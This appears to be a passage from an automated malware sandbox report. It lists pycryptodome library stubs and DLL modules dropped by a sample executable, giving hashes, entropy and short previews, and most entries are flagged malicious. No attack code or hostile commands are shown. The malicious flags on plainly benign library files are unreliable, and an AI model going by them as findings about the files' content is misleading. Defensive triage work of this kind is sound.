                                                                                                                                            Preview:from typing import overload..from typing_extensions import Literal....from Crypto.Hash.SHA1 import SHA1Hash..from Crypto.Hash.SHA224 import SHA224Hash..from Crypto.Hash.SHA256 import SHA256Hash..from Crypto.Hash.SHA384 import SHA384Hash..from Crypto.Hash.SHA512 import SHA512Hash..from Crypto.Hash.SHA3_224 import SHA3_224_Hash..from Crypto.Hash.SHA3_256 import SHA3_256_Hash..from Crypto.Hash.SHA3_384 import SHA3_384_Hash..from Crypto.Hash.SHA3_512 import SHA3_512_Hash....@overload..def new(name: Literal["1.3.14.3.2.26"]) -> SHA1Hash: .....@overload..def new(name: Literal["SHA1"]) -> SHA1Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.4"]) -> SHA224Hash: .....@overload..def new(name: Literal["SHA224"]) -> SHA224Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.1"]) -> SHA256Hash: .....@overload..def new(name: Literal["SHA256"]) -> SHA256Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.2"]) -> SHA384Hash: .....@overload..def new(name: Lit

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_ghash_clmul.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12800
                                                                                                                                            Entropy (8bit):4.999870226643325
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:DzFRF/1nb2mhQtk4axusjfkgZhoYDQgRjcqgQvEty:DzFd2f64axnTTz5D1gQvEty
                                                                                                                                            MD5:C89BECC2BECD40934FE78FCC0D74D941
                                                                                                                                            SHA1:D04680DF546E2D8A86F60F022544DB181F409C50
                                                                                                                                            SHA-256:E5B6E58D6DA8DB36B0673539F0C65C80B071A925D2246C42C54E9FCDD8CA08E3
                                                                                                                                            SHA-512:715B3F69933841BAADC1C30D616DB34E6959FD9257D65E31C39CD08C53AFA5653B0E87B41DCC3C5E73E57387A1E7E72C0A668578BD42D5561F4105055F02993C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%............P.....................................................`..........................................8......89..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_ghash_portable.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13312
                                                                                                                                            Entropy (8bit):5.025153056783597
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:AF/1nb2mhQtks0iiNqdF4mtPjD02A5APYcqgYvEL2x:62f6fFA/4GjDFcgYvEL2x
                                                                                                                                            MD5:C4CC05D3132FDFB05089F42364FC74D2
                                                                                                                                            SHA1:DA7A1AE5D93839577BBD25952A1672C831BC4F29
                                                                                                                                            SHA-256:8F3D92DE840ABB5A46015A8FF618FF411C73009CBAA448AC268A5C619CF84721
                                                                                                                                            SHA-512:C597C70B7AF8E77BEEEBF10C32B34C37F25C741991581D67CF22E0778F262E463C0F64AA37F92FBC4415FE675673F3F92544E109E5032E488F185F1CFBC839FE
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8......h9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_keccak.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16384
                                                                                                                                            Entropy (8bit):5.235115741550938
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:XTRgffnRaNfBj9xih1LPK73jm6AXiN4rSRIh42gDhgvrjcqgCieT3WQ:XafgNpj9cHW3jqXeBRamDOZgCieT
                                                                                                                                            MD5:1E201DF4B4C8A8CD9DA1514C6C21D1C4
                                                                                                                                            SHA1:3DC8A9C20313AF189A3FFA51A2EAA1599586E1B2
                                                                                                                                            SHA-256:A428372185B72C90BE61AC45224133C4AF6AE6682C590B9A3968A757C0ABD6B4
                                                                                                                                            SHA-512:19232771D4EE3011938BA2A52FA8C32E00402055038B5EDF3DDB4C8691FA7AE751A1DC16766D777A41981B7C27B14E9C1AD6EBDA7FFE1B390205D0110546EE29
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%."... ......P.....................................................`.........................................`I......TJ..d....p.......`..p...............,....C...............................B..@............@...............................text...(!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......6..............@....pdata..p....`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\_poly1305.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15360
                                                                                                                                            Entropy (8bit):5.133714807569085
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:JZNGXEgvUh43G6coX2SSwmPL4V7wTdDlpaY2cqgWjvE:EVMhuGGF2L4STdDyYWgWjvE
                                                                                                                                            MD5:76C84B62982843367C5F5D41B550825F
                                                                                                                                            SHA1:B6DE9B9BD0E2C84398EA89365E9F6D744836E03A
                                                                                                                                            SHA-256:EBCD946F1C432F93F396498A05BF07CC77EE8A74CE9C1A283BF9E23CA8618A4C
                                                                                                                                            SHA-512:03F8BB1D0D63BF26D8A6FFF62E94B85FFB4EA1857EB216A4DEB71C806CDE107BA0F9CC7017E3779489C5CEF5F0838EDB1D70F710BCDEB629364FC288794E6AFE
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%..... ......P.....................................................`......................................... 9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text...X........................... ..`.rdata..(....0......."..............@..@.data........@.......2..............@....pdata..|....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Hash\keccak.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):764
                                                                                                                                            Entropy (8bit):4.362163899247177
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBhvIY3PHpRyD1Ap1uw+z65JX3LBq3v37lz04LBK3P3blzO:1REYT3v/IALWz6LLBkPhz04LBEvBzO
                                                                                                                                            MD5:0A2310BA7677F27E22A421132A86D382
                                                                                                                                            SHA1:A976C8749DEE4E295DD8C808E2A7A47922E86BB4
                                                                                                                                            SHA-256:3A1DB3E7321EFB30C4AAF0FAD5728728C7AADCEBBBE91E4272940DB1F9A677F9
                                                                                                                                            SHA-512:6526BCDFF7B41EB7E94F83A2E1A770D6216E4C575410E8689C7119F6A53170CAA5B2F8AED037EB5AB40C7CA361C2E7208BF3F19C69D8E619150A1C68779FE22C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Any....Buffer = Union[bytes, bytearray, memoryview]....class Keccak_Hash(object):.. digest_size: int.. def __init__(self,.. data: Buffer,.. digest_bytes: int,.. update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> Keccak_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self,.. data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .......def new(data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\IO\PEM.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):313
                                                                                                                                            Entropy (8bit):4.63314311726341
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBbAmV4uDbIBFeLBysOZ4fJEBd1pHWERrBFeLsEiJos:1REYBbr+uWFeLB/OifJEjv2EDFeLsEi5
                                                                                                                                            MD5:107D6CC5B80CF3E12D074590F5D47AE5
                                                                                                                                            SHA1:E89B8FCF239CD49A0CFC3D7561C783EA63E2FD19
                                                                                                                                            SHA-256:FD17DE9B1D9EEB3950223BE5E5B16A8CA3EE0A7E4822557F0B882BFF3D67A1D0
                                                                                                                                            SHA-512:B6E46F3846AFB5E59C5C6C1454FEEEC7FDAA01665F811BFE5338035A5D34CE16347F58EE9921118BEE11D73DE9A5CC56B2B5CC5257EF406D90E495DE3F0C0435
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Tuple, Optional, Callable....def encode(data: bytes,.. marke: str,... passphrase: Optional[bytes] = ...,... randfunc: Optional[Callable[[int],bytes]] = ...) -> str: .........def decode(pem_data: str,.. passphrase: Optional[bytes] = ...) -> Tuple[bytes, str, bool]: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\IO\PKCS8.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):617
                                                                                                                                            Entropy (8bit):4.780296247881002
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBbr0mRE1BWS+EUe+LvjJMmxKxoIiNLojqyW38RJifJEvP5peYmrEidkLvFye:1REAYmC1X+u+/JMme4Loey1RMEnzurA/
                                                                                                                                            MD5:F1EBC42749EE63F11F55A1DD77B38380
                                                                                                                                            SHA1:9B592373655652EA3D08B222C68D62BED560C5E4
                                                                                                                                            SHA-256:17C9A6398CEC2B74DF62786B9A84553ECFE8660DBFBEEC47663BBEF0EBD8E167
                                                                                                                                            SHA-512:AB23620DF998CBB2519A67A272E12CA92C48167B1945DFE666C7E427BC3B9E3B6555130D04EF54A31639149A528A6F080B3220D28309E6E7D001274BB10C4A51
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Tuple, Optional, Union, Callable..from typing_extensions import NotRequired....from Crypto.Util.asn1 import DerObject..from Crypto.IO._PBES import ProtParams......def wrap(private_key: bytes,.. key_oid: str,.. passphrase: Union[bytes, str] = ...,.. protection: str = ...,.. prot_params: Optional[ProtParams] = ...,.. key_params: Optional[DerObject] = ...,.. randfunc: Optional[Callable[[int], str]] = ...) -> bytes: .........def unwrap(p8_private_key: bytes, passphrase: Optional[Union[bytes, str]] = ...) -> Tuple[str, bytes, Optional[bytes]]: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\IO\_PBES.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):781
                                                                                                                                            Entropy (8bit):4.711755021635503
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBrqRE1BWIWK+li56EotVepVnKqYjqytJifJEjP51K+lEhB5q:1REBC1WK+cH+mnKLeytMErDK+KQ
                                                                                                                                            MD5:104D32B3D75141B0546625AC5336C1EC
                                                                                                                                            SHA1:BDF345B0EBE5DC7E238D79FBD5FD63362C561195
                                                                                                                                            SHA-256:816463C1012174C626FDF286098D851BF55E201879FE9DEEADF777FD1CEA0794
                                                                                                                                            SHA-512:70AA3BEDD20562702462F69EF3209DF71C1CBDA73BDDDA451E7A2B490095AA1FEDEA4D7093BB8DB955148396A7F28BA9E7D8AC0B1B4644E4F252DED8A780A633
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Callable, TypedDict..from typing_extensions import NotRequired....class PbesError(ValueError):.. .......class PBES1(object):.. @staticmethod.. def decrypt(data: bytes, passphrase: bytes) -> bytes: .......class ProtParams(TypedDict):.. iteration_count: NotRequired[int].. salt_size: NotRequired[int].. block_size: NotRequired[int].. parallelization: NotRequired[int]....class PBES2(object):.. @staticmethod.. def encrypt(data: bytes,.. passphrase: bytes,.. protection: str,.. prot_params: Optional[ProtParams] = ...,.. randfunc: Optional[Callable[[int],bytes]] = ...) -> bytes: ....... @staticmethod.. def decrypt(data:bytes, passphrase: bytes) -> bytes: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Math\Numbers.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):84
                                                                                                                                            Entropy (8bit):4.429188967239666
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1mMkoERZ6sLmL3VosL1ydxFo+CsaCAX7y:1+ZRZHL+fW4CAe
                                                                                                                                            MD5:FC8E19CDD7D4DF22C857035B5460E98F
                                                                                                                                            SHA1:FB9CD60C695F8D19ECF44531A14EB9245E764F37
                                                                                                                                            SHA-256:37E4E3AA463400EF4A3F01217B46A3237D2FDA2795C78F936CC936AAB1875701
                                                                                                                                            SHA-512:314603B6BB03875A9B59F8A76BF32DABD71E52DC30D44C48C6C975746416227EF05144888620D3984712B78CBE899CE8DCEA4ED34C4883015562A7E217F98571
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from Crypto.Math._IntegerBase import IntegerBase as Integer..__all__ = ['Integer']..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Math\Primality.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):841
                                                                                                                                            Entropy (8bit):4.5810465816498
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REqa50Kg2G2+kEgR8WSgEgRnxDNaVSYnblDNaj:wCKzG2+NgVSBgZxDQVrRDQj
                                                                                                                                            MD5:A3ADEC74F909A4E9CFB74C5EFFD5162D
                                                                                                                                            SHA1:4325C3C9FD0FDA73843197C2B99E55C5DCACDFE4
                                                                                                                                            SHA-256:F73DAEA86E4577FDE3B6E314A1DA38441A8F0CA8AC64A018821E10706B80C903
                                                                                                                                            SHA-512:F0A41213290CA4D46C1A012D8FBF38B3E16D05D61BF815634EC587B03644F707D5726BFB264AE504BFB4A070210A2CCE1898B25A0697504C6B557D06BF7B2894
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Optional, Union, Set....PrimeResult = int....COMPOSITE: PrimeResult..PROBABLY_PRIME: PrimeResult....def miller_rabin_test(candidate: int, iterations: int, randfunc: Optional[Callable[[int],bytes]]=None) -> PrimeResult: .....def lucas_test(candidate: int) -> PrimeResult: ....._sieve_base: Set[int]..def test_probable_prime(candidate: int, randfunc: Optional[Callable[[int],bytes]]=None) -> PrimeResult: .....def generate_probable_prime(*,.. exact_bits: int = ...,.. randfunc: Callable[[int],bytes] = ...,.. prime_filter: Callable[[int],bool] = ...) -> int: .....def generate_probable_safe_prime(*,.. exact_bits: int = ...,.. randfunc: Callable[[int],bytes] = ...) -> int: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Math\_IntegerBase.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3810
                                                                                                                                            Entropy (8bit):4.6872218402303165
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REjiTAaR+gZ2KDRSjmnV69RuezESHcAFPS+ep0npIk/6I3ZuieIeKvJK5fCKsLm:giTnXDojmW8ABwi+M30W85fzsLm
                                                                                                                                            MD5:00C57D206A1CD7FC853656AF026AEC7E
                                                                                                                                            SHA1:0C3FDC977E7AE71D989B208A61DB93C66601177E
                                                                                                                                            SHA-256:C8A26AFF672F06B9C4D80286E0EF8DDE8B2B41FF4C317AB75ACA0FD0D01C751E
                                                                                                                                            SHA-512:74ECC9628812D52785545D3C5304AD5735C8D6C484C389B46F5D61AFCB339F136931C9A7A7759A6656028277B16ED6C21475F2E741B466516A9CA95BA5F61773
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Union, Callable....RandFunc = Callable[[int],int]....class IntegerBase:.... def __init__(self, value: Union[IntegerBase, int]): ....... def __int__(self) -> int: ..... def __str__(self) -> str: ..... def __repr__(self) -> str: ..... def to_bytes(self, block_size: Optional[int]=0, byteorder: str= ...) -> bytes: ..... @staticmethod.. def from_bytes(byte_string: bytes, byteorder: Optional[str] = ...) -> IntegerBase: ..... def __eq__(self, term: object) -> bool: ..... def __ne__(self, term: object) -> bool: ..... def __lt__(self, term: Union[IntegerBase, int]) -> bool: ..... def __le__(self, term: Union[IntegerBase, int]) -> bool: ..... def __gt__(self, term: Union[IntegerBase, int]) -> bool: ..... def __ge__(self, term: Union[IntegerBase, int]) -> bool: ..... def __nonzero__(self) -> bool: ..... def is_negative(self) -> bool: ..... def __add__(self, term: Union[IntegerBase, int]) -> IntegerBase: ..... def __su

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Math\_IntegerCustom.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):143
                                                                                                                                            Entropy (8bit):4.509027321360697
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1REvgBFovSL67L3XBVHa3VCfoovjeQACyWOAXUhvvn:1REYBFovSLwXBbfoyjlAqOAENv
                                                                                                                                            MD5:454B6FB1C6C3822CE064ED36C4C54D6E
                                                                                                                                            SHA1:3FCBB34C384AFEA58ECB58831F98A6AC2F22AAF9
                                                                                                                                            SHA-256:BAF20195FDB64EFAB526FE676151CE94716DCE7EF897EDFBF92BC744E53AECFD
                                                                                                                                            SHA-512:3505C80ED654D06FFBBA906455826D23CBC1C31798104762B0C116761037332E8197ED12E3ED92101E35A8F7CFCEF53BE887C80A0AF0B36BFFCC482B95F60750
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any....from ._IntegerNative import IntegerNative...._raw_montgomery = Any....class IntegerCustom(IntegerNative):.. pass..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Math\_IntegerGMP.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):81
                                                                                                                                            Entropy (8bit):4.306529623636421
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1L67L3VFGJeQACyoOXZohvvn:1LymJlAPmNv
                                                                                                                                            MD5:1B3750794FA1C99B19798392A644DD26
                                                                                                                                            SHA1:1449A147E2608AE5A6C9AFD5090E62992B39CAF7
                                                                                                                                            SHA-256:32D4D0B0B2FD179F5DFD1A04C22A2D3FD4D178D5C7645ECF15754FC073C7E508
                                                                                                                                            SHA-512:1ABCA6FB4ED46759D6BA04AB76F302AB9E3C14813F319295AAFAE68C91CFB3E197894916D8C9D464B35D5E14741E159CAC64166F30A0A05FF5BC9A3158D783FB
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from ._IntegerBase import IntegerBase..class IntegerGMP(IntegerBase):.. pass..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Math\_IntegerNative.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):84
                                                                                                                                            Entropy (8bit):4.2558290658438995
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1L67L3VFGJeQACyPLRAXZohvvn:1LymJlATLKmNv
                                                                                                                                            MD5:5629E6B58552EE91D828CFF9CA49219A
                                                                                                                                            SHA1:CDB1DCA0B7E2E94F5393A861422C1C38D4472763
                                                                                                                                            SHA-256:CA1DD04ECAC1474B1FBDAD15AB86881FB10E182A32C3AEB88C3F9F1B468E62E7
                                                                                                                                            SHA-512:074FE60CAE14932319C5C6174D10F7E77594AAA40FAE192D8B16098C867C010A756193163DA74EEA235FF46781A8FE68C257A5AB456D6F063A4A261813D352E5
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from ._IntegerBase import IntegerBase..class IntegerNative(IntegerBase):.. pass..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Math\_modexp.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):35840
                                                                                                                                            Entropy (8bit):5.928082706906375
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:8bEkzS7+k9rMUb8cOe9rs9ja+V/Mhjh56GS:8bEP779rMtcOCs0I/Mhf
                                                                                                                                            MD5:B41160CF884B9E846B890E0645730834
                                                                                                                                            SHA1:A0F35613839A0F8F4A87506CD59200CCC3C09237
                                                                                                                                            SHA-256:48F296CCACE3878DE1148074510BD8D554A120CAFEF2D52C847E05EF7664FFC6
                                                                                                                                            SHA-512:F4D57351A627DD379D56C80DA035195292264F49DC94E597AA6638DF5F4CF69601F72CC64FC3C29C5CBE95D72326395C5C6F4938B7895C69A8D839654CFC8F26
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d......e.........." ...%.^...0......`.....................................................`..........................................~..|...\...d...............................,....s...............................q..@............p..(............................text...8].......^.................. ..`.rdata.......p.......b..............@..@.data................v..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Protocol\DH.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):482
                                                                                                                                            Entropy (8bit):5.105314197006538
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB9mNRE1BgS+1dwCw+cKl1J/5NcpN9NVSyoGyv:1REuyC1R+169gvC/gyfyv
                                                                                                                                            MD5:69A7EFD78AFDEF04820558CECC146AE6
                                                                                                                                            SHA1:3CF02E290E2C748FEB0AA29B55FB9C8BE7421E81
                                                                                                                                            SHA-256:FC079D87295B952D7A52929D205ED7BBED1EE2741479E96337FA7EBC9428A26A
                                                                                                                                            SHA-512:8F1CD56424FC12C86AA16ED0DBC076E2D0FA7714CE93F4D9B1C109BB661285563E4AA2918C48A2DC076B945ED2207197F53683946E29C78F1B9F32E668E54F03
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import TypedDict, Callable, TypeVar, Generic..from typing_extensions import Unpack, NotRequired....from Crypto.PublicKey.ECC import EccKey....T = TypeVar('T')....class RequestParams(TypedDict, Generic[T]):.. kdf: Callable[[bytes|bytearray|memoryview], T].. static_priv: NotRequired[EccKey].. static_pub: NotRequired[EccKey].. eph_priv: NotRequired[EccKey].. eph_pub: NotRequired[EccKey]....def key_agreement(**kwargs: Unpack[RequestParams[T]]) -> T: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Protocol\KDF.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):30052
                                                                                                                                            Entropy (8bit):5.514468660237484
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:Wz6ez57dXVIx6d1bOs/lzDRzT1OzxQHJ56zEA7:WXBtRbOMzt1ExQJO
                                                                                                                                            MD5:58650811FE598F282228A5EB94DC02EC
                                                                                                                                            SHA1:94AD1AE98F6FF52427ED7B0DAD1BD18A5A166B3B
                                                                                                                                            SHA-256:FA7F603E3F9AE8B70629BFDE1FE7ECCB95661A6D1EEFBCD3C3DD1D1FE66F0A59
                                                                                                                                            SHA-512:90C3CA3B4DF4A4961EE1CA1E8D53B6C8BFA477A9C78870E9F07A6FD9FBE1994CD0713CB2B133B7962DCADDDD3823358D061E9FF878154C10170E07C0CDE08E37
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.Y........................:.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z ..e.d.d...............Z!d.d...Z"d.d...Z#..G.d...d.e$..............Z%d.d...Z&d d...Z'd...Z(d...Z)d...Z*d!d...Z+d...Z,d"d...Z-d.S.)#.....N)...reduce)...tobytes..bord.._copy_bytes..iter_range..tostr..bchr..bstr)...SHA1..SHA256..HMAC..CMAC..BLAKE2s)...strxor)...get_random_bytes)...size..long_to_bytes..bytes_to_long)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..c_size_tz.Crypto.Cipher._Salsa20z.. int Salsa20_8_core(const uint8_t *x, const uint8_t *y,. uint8_t *out);. z.Crypto.Protocol._scrypta..... typedef int (core_t)(const uint8_t [64], const uint8_t [64], uint8_t [64]);. int scryptROMix(const uint8_t *data_in, uint8_t *data_out,.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Protocol\KDF.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2038
                                                                                                                                            Entropy (8bit):4.91503915615325
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:ccWF4ZIA4B0Aq3myAjhANxt9z5RJx6Rgmqd:ccWFgR42Aq3myANAPz5RJURgmQ
                                                                                                                                            MD5:1687A469EDFFF0FFDAA2B11B36773D3E
                                                                                                                                            SHA1:33C8FB6F81ACDB5D4269C3B71B4357A75D3717DA
                                                                                                                                            SHA-256:B131B886A651ED555E85ED9776332A77826C1EECF002D077573CCB3B6E410F8D
